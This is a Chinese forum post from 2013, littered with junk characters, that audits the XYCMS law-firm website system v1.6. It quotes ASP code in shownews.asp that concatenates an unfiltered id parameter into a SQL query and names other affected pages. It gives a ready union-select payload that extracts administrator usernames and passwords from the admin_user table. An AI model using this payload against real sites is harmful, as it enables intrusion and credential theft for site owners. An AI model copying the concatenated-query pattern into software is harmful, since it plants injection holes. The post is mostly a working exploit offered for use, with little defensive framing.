前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
3 @) r9 K- T. l/ s. c3 R' g k4 w
- s9 N# B7 p' b; P# c) N! l/ ^淫荡分割线) _9 M2 \2 Z. b; q0 `
-------------------------------------------------------- G( x0 ], i$ A/ h7 A: u8 y' T
8 ~; a, ]- K5 j ]审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
4 X w, C/ M: P* g源码地址:http://down.chinaz.com/soft/29233.htm
7 L) c3 y- ?' d! g* h& u4 |3 p ; `2 h2 V. ^3 i( o! N) t0 a* j& [
漏洞文件:shownews.asp
6 t# O, K7 Z3 _# y8 }+ \漏洞代码:7-13行
& N" P1 e0 r0 t: T" s" G& l 9 c: i/ u8 C! D
u6 @( Q9 R6 f<% $ o& Y5 y2 s7 H6 z7 k
id=request.QueryString("id")
" F% Q7 _& g- b" I ]0 p ( ^) |, [5 G3 @
set snews=server.createobject("adodb.recordset") " ~ e6 j$ d, J) ^2 d1 o: E
exec="select * from [news] where id="&id3 [+ j1 _& s, ~& X5 K: q* w+ {' N
snews.open exec,conn,1,1
% D/ [7 G; k, V%>
' J+ B2 F& k4 j% r- C # m4 c* e% ^4 ^. l5 |4 \- d$ ^
/ T/ n9 d! k- U. T什么过滤都没有 直造成注入
' }6 H& W( O7 F2 ~ 0 x: u. f" n; M4 H8 c$ T6 g+ A
注入点:http://127.0.0.1:99/shownews.asp?id=xx
1 K l4 n$ R0 k! P3 \9 }1 g( B' ?
9 J; k$ g7 R. D- I: N其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
$ g( r0 ~' Z+ ]* P2 `
5 @ X( `: _3 X! [7 Q2 p/ x
! m. O6 n9 `1 P* J! r& w. Iexp: union select 1,admin,password,4,5,7 from admin_user, R8 M8 H8 R) h9 U7 J+ W3 I
+ r' P. q6 ~" s4 @* [7 r
|
发表于 2013-4-4 17:28:12
收藏
支持
反对